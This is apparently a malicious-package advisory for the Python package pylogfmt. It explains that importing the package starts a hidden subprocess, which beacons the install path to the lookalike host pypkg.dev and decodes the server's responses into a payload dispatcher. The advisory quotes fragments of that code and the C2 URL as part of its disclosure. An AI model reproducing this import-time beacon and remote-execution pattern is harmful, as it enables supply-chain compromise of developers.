MAL-2026-4231

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (34bc39125496330ed9b38f1f6d7f06db7e150d83144f9d7e1e04552112851c4a) On `import pylogfmt`, the package's __init__.py spawns a detached background subprocess (`subprocess.Popen([sys.executable, '_check.py'], stdout=DEVNULL, stderr=DEVNULL)`) that runs an infinite loop POSTing the package install path to https://pypkg.dev/project/pylogfmt/json every 60 seconds with TLS verification explicitly disabled. The HTTP response body is base64-decoded and dispatched to a worker thread (`threading.Thread(target=check, args=(package_list.decode(),))`), which is the canonical remote-payload-dispatcher shape — the operator controls returned bytes and the client decodes and feeds them into a handler. The destination domain pypkg.dev is a lookalike of pypi.org/pypa with no relation to the package's declared logging-library purpose. Output suppression (DEVNULL on both streams), undocumented behavior (README advertises only a logging helper), TLS bypass, and lookalike C2 destination together are unambiguous attack signals. Any consumer that imports pylogfmt as a library leaks their install path to attacker infrastructure on a 60-second polling interval and is one server-side change away from arbitrary remote code execution.

## Source: kam193 (ba18f7e82fa8d07985ef44f6ce5a8d4b7759f2e348b6ba073bba4dd463740d8e) Package silently executes remote code during import.

---

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-05-lognest

Reasons (based on the campaign):

- Downloads and executes a remote malicious script.